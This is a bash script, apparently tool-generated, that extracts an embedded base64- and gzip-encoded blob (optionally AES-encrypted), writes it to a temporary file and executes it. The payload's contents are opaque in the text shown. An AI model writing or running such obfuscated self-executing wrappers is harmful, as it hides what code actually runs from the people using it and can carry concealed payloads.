#!/usr/bin/env bash
# Obfuscated bootstrap wrapper (temp-file exec variant)
# Generated by make-obfuscated-sh.sh
set -euo pipefail

# The generator sets OBF_ENCRYPTED accordingly; for encrypted payloads, provide OBF_PASS at runtime.
: "${OBF_ENCRYPTED:=0}"

# ---- Decoders ----
dec_b64()  { base64 -d; }
dec_gzip() { gzip -dc; }
dec_aes()  { openssl enc -aes-256-cbc -md sha256 -pbkdf2 -d -pass env:OBF_PASS; }

# Extract everything after the payload marker
extract_payload() {
  awk 'f{print} /^__PAYLOAD__$/ {f=1}' "$0"
}

# Run payload from a temp file (NOT via "bash -s")
run_payload() {
  tmp="$(mktemp)"; trap 'rm -f "$tmp"' EXIT
  if [ "${OBF_ENCRYPTED}" = "1" ]; then
    extract_payload | dec_b64 | dec_aes | dec_gzip > "$tmp"
  else
    extract_payload | dec_b64 | dec_gzip > "$tmp"
  fi
  exec /usr/bin/env bash "$tmp" "$@"
}

# Entry
OBF_ENCRYPTED=0

run_payload "$@"
exit 0

__PAYLOAD__
H4sIAAAAAAACA7VX23LbNhB911dsGTmSphFpu007VUfuqBJts9FtKCqZTCbjgUhIQkyCDABKcd38
exeALsztzfKDTYLA7mLP2bPrZz95C8a9BZHrWu0ZdJ/0Bw1euNAPJ2Pwx68D/DvyxxHM/Gg+hWY/
DKKg3xu2TuG3L3IOouQStkytgUDGOMtICtNedOvCGwpZKRXQT0XKYqbSB5BUAVOgclgyngBmhQhG
JaCxlN1TaPANSxhpy4w1XkBDrkuV5Fuun9N8taICnwgebJDtfQNILHIpgaQpzBclVyVsqJAs59Kt
odNcKBNJ1yul8NI8Jqkn0WWn8n54PX4wD/YVf50EsEsEbDK+Dm7mYS8KJuOn9zGc3NwNgrDreBui
77ryVkXZXlOSqrVjvl4HQ7/r1HcbPZv4O0EXea7u1kyqXDy4eNCpjYLx3XwaBSO/+8f5OQAS7iWM
GC8VItfUS5LGOU9ky4WpoBvKlQTGEWGmKFiLkOZ5gbCcIpu/uBBOJhG87g2DwYnyyZbwDpy6Pw8G
DrQ5hXN4/yeoNeU1AJ0SJHspKViWwpoKCgsaE722pRAT3lCwFTohSP49KIBmOSZHYIaMnd3xtgIN
V7ym8T04fhhOwg7MYsEKBUQpmhWKJtoQFp+pvby0Rlxbkx/yhS29BbXLjrFOP2HtXdSWTMPgc1kK
EzAkTNBY4613SCVr2T0uQbuAAz+ckyD3qwu3/nDqh3A9H/c1ch1AhzfB+Obp3eFN7ww5my143GUb
JQBSXEyxEi6cymImV7h0WV1KVLfeTAgi6Px89rZ9lrXPEji77ZyNOmczp2V27siAgvxmj7U9vGQp
tRjE6xycd/VEvYd3deP7PdTRnQNXV7t869J0qvYuK/ZmDxIJAP/kpeBouLlhdEsWKYUNI9D4YJdj
lX5Bokbrh/TSKCNLhWuDcTAGHU3t80kQf+nCqBeMEfbeMLqF/q3ff/X0fnRvMpfT9XXoKLbdHEiO
336COM8y3VDam+rG51fgJXTj8TJNK1V+YBA4+76K6frWQcakZHzlwkAw7EimtWHzKznjUmG3oglm
gfDS8OITKuTHEisw+V6Vhljg6B8MVvjeHqI1jB5upnPpQrCE8evREJgWXKYYSdm/NHmBR3BFUIVk
kHDu1ow+oQtT6CBVQoXQZMInLR3Ny6vnFy29EJNCaVnA77mAjEpJVhR1ezKPpvMIC6ByW4zFnKvN
ol40n3Xrf9WsTtbtArTpx290EuPW0d6aTvTgwlE+k1xr4RoTZ1q8SYPEsuF6cMDQ7iktINbyhjhI
iFNKuHvM2HmNppJWvFwTluqrDKjCS9PkawiNrCJ+eq9liz6hsfG1vX6e0M7+Ks6PDvsmT5NSFaXC
3TZNKJY2jCektDX4mwuz3rUfvbWV0wHbl0/l7gbHtbJQLKNIr32XhyZb8VxonJaCxErPW1Ze5tO7
mY+DzQC50IyJAq8QeeztLPwHOLRB47HAozgFog7XL1qfUZnM2V2DPZrANptiouvH6cP5gkpfAfKm
F46xbSAkMyp00e3jlpBzJFD98Wj6M1bOSI+qZXYoPgTv8egKdzjf81Ip+9DONbNXwXTqDzRBCzv7
HEefw+CDcxGyVe7KGNZEJFsiqJcYfaj62hW/ftQCcCJcf8eJyR/5g6Bne27o/40D1Gm8fT97gVEr
pUkkbUPbzYl6qEGeaQR1Ye4z5LpfNMTZA49xbJH3spp4bM4E/UlpdkncUz1znYt4P46aJTPke/v/
MaAtUH+2e2B1ZElpOi7+V4WZMuEsd5qS7DQFFg9WknDicrRk/w8eNZsp6w0AAA==

